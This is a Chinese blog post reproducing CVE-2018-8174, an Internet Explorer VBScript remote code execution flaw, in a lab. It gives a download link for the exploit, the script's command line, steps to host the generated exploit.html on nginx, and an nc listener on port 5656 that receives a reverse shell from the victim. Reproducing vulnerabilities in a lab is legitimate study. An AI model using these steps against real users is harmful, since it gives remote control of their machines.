【漏洞復現】IE 瀏覽器遠程代碼執行漏洞(CVE-2018-8174)

 

一、CVE-2018-8174(本質是 Windows VBScript Engine 代碼執行漏洞)

由於 VBScript 腳本執行引擎(vbscript.dll)存在代碼執行漏洞,攻擊者可以將惡意的 VBScript 嵌入到 Office 文件或者網站中,一旦用戶不小心點擊,遠程攻擊者可以獲取當前用戶權限執行腳本中的惡意代碼,該漏洞影響最新版本的IE瀏覽器及使用了 IE 內核的應用程序。用戶在瀏覽網頁或打開 Office 文檔時都可能中招,最終被黑客植入後門木馬完全控制電腦。在基於 Web 的攻擊情形中,攻擊者能通過 Internet Explorer 利用此漏洞的特定網站,然後誘使用戶查看該網站。攻擊者還可以在承載 IE 呈現引擎的應用程序或 Microsoft Office 文檔中嵌入標記爲“安全初始化”的 ActiveX 控件。攻擊者還可以利用受到破壞的網站和接受或託管用戶提供的內容或廣告的網站。這些網站可能包含可能利用此漏洞的特製內容。該漏洞影響最新版本的IE瀏覽器及使用了 IE 內核的應用程序。用戶在瀏覽網頁或打開 Office 文檔時都可能中招,最終被黑客植入後門木馬完全控制電腦。

影響範圍:

Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers

 

二、準備

攻擊機:kali-2019    192.168.75.134

靶機:win7_x86(關閉防火牆)    192.168.75.130

exp 鏈接: https://pan.baidu.com/s/1se1UyXIgkI2y7lgEvINTBw 提取碼: s8bk

 

三、復現

1、下載 exp

2、執行 python 腳本,參數格式 “python CVE-2018-8174.py -u http://攻擊機IP/payload.html -o payload.rtf -i 攻擊機IP -p 指定端口” ,執行完畢後會生成 exploit.html 和 payload.rtf 兩個文件,然後將 exploit.html 拷貝到 NGINX 網站目錄下,kali 默認安裝了 Apache 和 NGINX 

3、由於 kali 默認安裝了 Apache 和 NGINX,因此先關閉 Apache ,然後重啓 NGINX 

4、現在可以啓動工具 nc 來監聽剛剛設置好的端口 5656,等待對方打開網站

5、現在用靶機訪問剛纔生成的網頁 http://192.168.75.134/exploit.html ,頁面提示錯誤,但是攻擊已經成功

6、回到攻擊機,可以看到已經 getshell,靶機關閉瀏覽器也不影響

 

 

 

 

參考:

https://www.jianshu.com/p/8ca521439792

https://blog.csdn.net/qq_39627497/article/details/84846948

https://www.cnblogs.com/tsimfeiwan/p/11990565.html

 

 

 

 

發佈了66 篇原創文章 · 獲贊 30 · 訪問量 2萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章